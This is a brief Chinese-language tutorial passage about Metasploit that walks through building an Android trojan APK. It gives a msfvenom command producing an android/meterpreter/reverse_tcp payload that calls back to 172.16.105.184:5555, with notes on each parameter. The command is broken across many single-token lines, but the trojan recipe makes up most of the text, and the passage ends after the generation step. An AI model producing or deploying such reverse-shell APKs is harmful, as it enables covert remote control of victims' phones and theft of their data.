Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
环境准备:
Kali2.0(msfVENOM、metasploit)
安卓手机或安卓模拟器
利用过程:
先查看本地IP地址
使用msfvenom生成apk木马
1
|
msfvenom
-
p
android
/
meterpreter
/
reverse_tcp
LHOST
=
172.16.105.184
LPORT
=
5555
R
>
/
root
/
apk
.
apk
|
注释:
LHOST = 接收反弹连接主机
LPORT = 接收反弹连接主机的监听端口
172.16.105.184修改为本地的IP地址 5555是生成的端口号/root/apk.apk是生成的APK路径